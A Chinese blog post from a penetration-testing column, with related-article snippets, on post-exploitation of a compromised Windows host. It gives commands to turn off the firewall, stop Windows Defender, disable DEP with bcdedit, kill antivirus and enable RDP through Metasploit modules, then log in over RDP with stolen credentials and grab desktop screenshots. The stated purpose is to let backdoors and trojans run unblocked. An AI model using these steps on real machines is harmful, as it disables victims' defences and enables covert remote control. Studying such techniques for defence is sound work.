关闭防火墙和杀毒软件并开启远程桌面

最新推荐文章于 2024-04-21 16:56:30 发布
最新推荐文章于 2024-04-21 16:56:30 发布
阅读量1.8k 收藏 10
点赞数
分类专栏: 内网渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/115015169
版权

关闭防火墙

当我们拿下一台主机后,向在主机上留后门和放木马,那么我们的首要任务就是关闭主机的防火墙。因为防火墙会把我们的木马文件拦截。

首先先得到目标主机的管理员权限,并进入shell界面
在这里插入图片描述
在这里插入图片描述
然后在命令行中输入netsh advfirewall set alllprofiles state off,将防火墙成功关闭
在这里插入图片描述

关闭windows Defender和DEP数据执行保护

可以看到计算机的Defender默认是开启的,defend和DEP会拦截我们的恶意操作,所以要将其关闭掉
在这里插入图片描述
然后在命令行中输入net stop windefend关闭defender,键入bcdedit.exe /set {current} nx AlwaysOff关闭DEP数据执行保护
在这里插入图片描述
在这里插入图片描述

关闭杀毒软件

关闭杀软应该是最最重要的一步了,想让木马安全放行,那么杀软必定是一个最大的阻碍。因为我的计算机上没有安装杀软,所以看不到效果,命令是run post/windows/manage/killav
在这里插入图片描述

开启远程桌面

可以看到远程主机上的3389端口是默认不开放的
在这里插入图片描述
现在我们退回到meterpreter命令行中,执行开启远程桌面操作,对目标主机执行更多更方便的操作做准备,首先执行run post/windows/manage/enable_rdp命令
在这里插入图片描述
这里还提供了关闭和清除痕迹的脚本,我们可以看看其中的内容
在这里插入图片描述
可以看到,脚本是通过注册表的方式对远程桌面功能关闭的,并且创建了一个cmd进程,对防火墙的规则也进行了设置

然后我们通过上一节获取的用户名和密码,对目标主机进行远程连接,命令为rdesktop -u pyh -p 12 目标主机的IP地址
在这里插入图片描述
如果我们想看看目标主机的页面截图,我们也可以加载load espia这个插件,然后输入screengrab即可保存目标主机的桌面截图
在这里插入图片描述
然后使用eog这个软件查看保存的图片
在这里插入图片描述
关闭远程桌面,我们运行如下命令即可run multi_console_command -r /root/.msf4/loot/20210319210131_default_192.168.75.139_host.windows.cle_636232.txt后面的txt文件是开启远程桌面时生成的关闭文件,替换掉即可
在这里插入图片描述

平凡的学者
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
win10不能被远程解决方案(开启远程桌面,防火墙仍不能被远程解决方案)
墨颜丶缔造非凡
05-29 2万+
开启远程桌面,防火墙仍不能被远程解决方案 1.“Win+R”→“gpedit.msc” 2.依次展开“计算机配置”→“管理模版”→“系统”→“凭据分配”→找到“允许分配保存的凭据用于仅NTLM服务器身份验证” 3.单击“启用”→继续单击“启用”→输入“TERMSRV/*”→确定 4.设置后,输入“Win+R”→输入“gpupdate /force”可强制生效刚才的应用 5.!!!这一
电脑防火墙在哪里设置_如何远程访问电脑
weixin_39944542的博客
11-16 936
如何远程访问电脑?步骤:开始→程序(windows 7上显示的是所有程序)→附件→远程桌面连接输入被连接的IP跟登陆账号还有密码即可在这之前,你必须保证被连接的电脑是允许远程连接的,并且关闭防火墙,具体设置方式如下:1、windows 7系统:在桌面上选中“计算机”点击鼠标右键选择属性,在弹出面板的左侧选择‘远程设置’,在弹出对话框的“远程”选项卡中的第一栏就是“远程协助”栏,勾选“允许...
windows电脑关闭防火墙、杀毒、实时扫描教程(超详细)
最新发布
weixin_52515058的博客
04-21 1560
windows关闭防火墙、实时扫描教程(超详细)
远程桌面连接和防火墙设置
PoPo's Blog
03-21 1万+
分享windows自带远程桌面连接使用和防火墙设置方法。
后渗透之关闭防火墙杀毒软件开启远程桌面
good good study
04-13 8124
目录 一. 关闭防火墙 二.关闭windows Defender和DEP数据执行保护 三. 关闭杀毒软件 四. 开启远程桌面 当我们拿下一台主机后,想在主机上留后门,那么我们的首要任务就是关闭主机的防火墙。因为防火墙会把我们的后门程序进行拦截。我们用msf获取到了权限 一. 关闭防火墙 以下是在win7和win2008r2的机器上实验的,在administrator和system的权限下都能成功将防火墙关闭和开启。普通用户不行 1. 在system权限下执行 此时防火墙的状态是开启的.
Windows系统批量禁用Defender杀毒软件
StepTp的博客
05-03 1582
Windows系统批量禁用Defender杀毒软件 文章目录Windows系统批量禁用Defender杀毒软件前言一、禁用方式二、禁用脚本总结 前言 ​ 由于工作需要,需要在windows系统上永久禁用windows defender 杀毒软件且即时生效,但不能重启系统,故编写BAT禁用脚本。 一、禁用方式 编辑组策略。 直接修改注册表键值。 直接卸载Defender服务。 其余。。。 二、禁用脚本 适用范围: 企业版 windows 10,windows 7 。 企业版 windows s
msf 渗透基础篇(基本命令)
失心少年
07-30 2449
以 kali 为例,几个关键路径,熟悉一下,为了更方便的查找。
电脑高危端口的禁用以及防火墙的开关,关闭远程桌面
weixin_42040971的博客
11-02 5300
电脑高危端口的禁用以及防火墙的关闭
网络人远程控桌面软件(免费版)
03-30
网络人远程控桌面软件(免费版),免杀,正版软件!杀毒软件开启也能运行!!不像其他的远控软件一样要关闭杀毒软件防火墙!
系统自带桌面远程连接
05-18
在Windows操作系统中,这一服务通常默认启用,但如果没有,可以在“控制面板”->“程序和功能”->“打开或关闭Windows功能”中勾选“远程桌面服务”。 2. **花生壳的使用** 如果你需要通过互联网进行远程连接,...
远程控制软件-网络神偷
10-06
网络神偷是一个专业的远程文件管理与桌面管理软件,它有: ·多样功能供你使用 ...在下载和使用网络神偷时,如果杀毒软件报毒属正常现象,只要关闭杀毒软件就可以了,网络神偷内绝不含病毒、后门!请放心使用!
上兴远程控制 这是一款优质的远程控制软件
03-05
2、关闭防火墙或设置防火墙充许你设置的上线端口。 --------------------------------------------------- 6、为什么打开控制端会连接一个IP的80端口? 答:查找升级,找到会提示升级,如不想要升级提示,‘设置...
网管教程 从入门到精通软件篇.txt
04-25
网管教程 从入门到精通软件篇 ★一。★详细的xp修复控制台命令和用法!!! 放入xp(2000)的光盘,安装时候选R,修复! Windows XP(包括 Windows 2000)的控制台命令是在系统出现一些意外情况下的一种非常有效的...
mesploit后渗透测试阶段常用命令
热门推荐
星落的博客
05-24 1万+
1.关闭windows防火墙(需要管理员或system权限) netsh advfirewall set allprofiles state off 2.关闭windefend net stop windefend 3.关闭Bitlocker磁盘加密 manage -bde -off C: manage -bde -status C: 4.关闭DEP bcdedit.exe /set {current} nx AlwaysOff 5.杀死放杀毒软件 run killa..
Windows脚本系列之二——使用脚本关闭windows防火墙
weixin_34274029的博客
05-15 427
Windows XP在安装SP2后会自动打开Windows防火墙,这个功能对于个人用户来说,可能是一个很实用的功能,因为它可以在一定程度上保护我们的系统。但是在企业环境中,它却是一块鸡肋,因为我们在企业中有自己的对外防火墙,在内部有企业级的杀毒软件。多一个系统的防火墙作用不大,倒是在我们需要远程管理客户端电脑时,经常受到它的干扰。很多管理员为了方便管理都会关闭它,不过,如果客...
关闭windows自带杀毒软件Windows defender命令,命令行关闭windows服务
墨痕诉清风的博客
03-26 6677
net stop windefend
win10关闭防火墙脚本.bat
qq_37658401的博客
05-11 2900
@echo off %1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit cd /d "%~dp0" echo 关闭防火墙 NetSh Advfirewall set allprofiles state off echo 防火墙状态 Netsh Advfirewall show allprofil...
远程--不用关闭防火墙,也可以远程连接(远程桌面连接不上怎么办)
VIP_CR的博客
01-19 1万+
大家在使用远程桌面功能时可能会遇到远程桌面连接不了的情况,在这里给大家介绍解决方法。 远程桌面连接可以远程控制另一台电脑做各种操作,凡事都可能会出现一些意外的问题,同样win7远程桌面也可能会出现远程桌面连接不上的问题。 正常设置远程连接一般需要下面几个设置: 1).查询并记录远程计算机的IP,开始——运行——输入cmd,回车,在cmd界面输入ipconfig/all 回车查看IPv4地址 2)....
proxychains代理扫描并获取内网服务器权限
weixin_45007073的博客
03-25 2926
Proxychains Proxychains是为了GNU\Linux操作系统而开发的工具,任何TCP连接都可以通过TOR或者SOCKS4,SOCKS5,HTTP/HTTPS路由到目的地。在这个通道技术中可以使用多个代理服务器。除此之外提供匿名方式,诸如用于中转跳板的应用程序也可以用于对发现的新网络进行直接通信。 利用思路 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值